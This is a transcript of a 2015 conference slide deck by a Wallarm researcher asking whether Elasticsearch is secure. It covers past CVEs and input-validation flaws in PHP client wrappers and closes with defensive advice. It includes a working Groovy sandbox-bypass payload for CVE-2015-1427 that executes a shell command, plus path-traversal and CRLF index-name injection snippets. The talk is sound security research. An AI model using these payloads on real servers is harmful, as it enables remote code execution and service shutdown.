Ivan Novikov - ElasticSearch is secure?

0c988f4618b436b14ce6ddcecd52d11d?s=47 DC7499
July 03, 2015

Ivan Novikov - ElasticSearch is secure?

DEFCON Moscow 9

0c988f4618b436b14ce6ddcecd52d11d?s=128

DC7499

July 03, 2015
Tweet

Transcript

  1. ElasticSearch: Is it secure? @d0znpp Wallarm research

  2. What is ElasticSearch? “Elasticsearch is a distributed RESTful search engine

    built for the cloud.“ Official repo: https://github.com/elastic/elasticsearch Distributed Lucene instances broker • RESTful API • Native Java API Clients: https://www.elastic.co/guide/index.html
  3. Previous works • NoSQL Injection for Elasticsearch Kindle Edition by

    Gary Drocella http://goo.gl/OnfMOz => ACL to 9200 and 9300 • NoSQL Injections: Moving Beyond 'or '1'='1'. Matt Bromiley Derbycon 2014 http://goo.gl/UBh42h => do not produce JSON by strings concatenation • Securing ElasticSearch http://goo.gl/Ik3023 => Use Nginx to provide BasicAuth and other advices
  4. None
  5. Previous bugs: 5 CVE https://www.elastic.co/community/security • CVE-2015-4165 is not disclosed

    yet ;( “All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.” • CVE-2015-3337 path trav. https://goo.gl/YWwu3a • CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC • CVE-2014-6439 CORS issue https://goo.gl/7kMxod • CVE-2014-3120 Java RCE https://goo.gl/iZL5L8
  6. Sandbox bypass 1427 { "size":1, "script_fields":{ "lupin":{ "script":"java.lang.Math.class.forName(\"java.lang.Runti me\").getRuntime().exec(\"id\").getText()" }

    } }
  7. What is my point? BugBounty https://research.facebook.com/search?q=a%20 200 https://research.facebook.com/search?q=a%22 500 $1000

    reward for injection into JSON to ElasticSearch But it might be RCE...
  8. What is my point? • Want to hack it through

    web-applications • Because it’s really rare case when ES is present at network perimeter • To check wrappers for different platforms for input validation attacks • Yes, the same as with Memcached injections https://goo.gl/9qV620 [BHUS-14]
  9. 4 popular clients (wrappers) http://jolicode.com/blog/elasticsearch-php-clients-test- drive • Original (elasticsearch) •

    Sherlock • Elastica • Nervetattoo Let’s start from PHP
  10. • RESTful tricks (while user data at URL ../ et

    al.) • JSON syntax breakers ( \ “ } { ] [ ) • Native Java API • Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) Input validation kinds
  11. • RESTful tricks (while user data at URL ../ et

    al.) • JSON syntax breakers ( \ “ } { ] [ ) • Native Java API <- Only about RESTful clients now • Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) <- ES internals, not clients Input validation kinds
  12. • All URI parts goes through PHP urlencode(). But dot

    (0x2e) IS NOT encoded by RFC • json_encode protects from injections into values $params = array(); $params['body'] = array('testField' => 'abc'); $params['index'] = '..'; $params['type'] = '_shutdown'; // Document will be indexed to my_index/my_type/<autogenerated_id> $ret = $client->index($params); elasticsearch original
  13. • URI parts “as is” • json_encode protects from injections

    into values $results = $es ->setIndex("what/../do/you/want!/") ->setType("and/../here/also!") ->search('title:cool&key=value&script_fields');//CVE nervetattoo
  14. But it’s a raw socket, baby! $results = $es ->setIndex("

    HTTP/1.1\r\n…”script”:”...”") // CVE ->setType("my_type") ->search('title:cool'); nervetattoo
  15. • Use DSL methods • Index name and type are

    not for users • Do not concatenate strings to JSON • Always filter data before putting into wrappers Conclusions
  16. https://twitter.com/d0znpp blog.wallarm.com Thx!